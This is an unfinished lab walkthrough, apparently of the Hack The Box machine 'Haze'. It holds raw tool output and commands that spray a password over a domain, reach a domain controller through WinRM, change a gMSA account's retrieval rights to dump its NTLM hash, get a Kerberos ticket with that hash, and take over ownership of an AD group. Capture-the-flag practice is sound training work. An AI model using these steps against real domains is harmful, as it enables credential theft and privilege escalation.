SMB         10.129.12.198   445    DC01             [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[✔] Privilege escalation scan complete. Logs saved in: nxc-logs-2025-04-04_14-48-54
  • Not much we can do as Paul, but the password spray shows the same password is valid for mark.adams
  • Run nxc.sh again as mark.adams (the BloodHound collection will actually work when loaded)
[+] Testing WinRM access...
WINRM       10.129.12.198   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.12.198   5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

  • Attempt to dump the gMSA password hash (it comes back empty)
$ nxc ldap dc01.haze.htb -d haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
 
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.12.198   636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.12.198   636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.12.198   636    DC01             Account: Haze-IT-Backup$      NTLM:
  • Need to enable retrieval by modifying PrincipalsAllowedToRetrieveManagedPassword
$ nxc winrm dc01.haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -X 'Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"'
 
WINRM       10.129.12.198   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.129.12.198   5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
WINRM       10.129.12.198   5985   DC01             [+] Executed command (shell type: powershell)
 
$ nxc ldap dc01.haze.htb -d haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
 
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.12.198   636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.12.198   636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.12.198   636    DC01             Account: Haze-IT-Backup$      NTLM: a70df6599d5eab1502b38f9c1c3fd828
  • Use the hash to get a TGT, then change the owner of Support_Services
$ getTGT.py -hashes :a70df6599d5eab1502b38f9c1c3fd828 haze.htb/Haze-IT-Backup$
 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Saving ticket in Haze-IT-Backup$.ccache
 
$ export KRB5CCNAME=Haze-IT-Backup$.ccache
$ bloodyAD --host dc01.haze.htb --dc-ip 10.129.12.198 -d haze.htb -k set owner "SUPPORT_SERVICES" 'Haze-IT-Backup$'
 
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
  • Add GenericWrite

NEED TO FINISH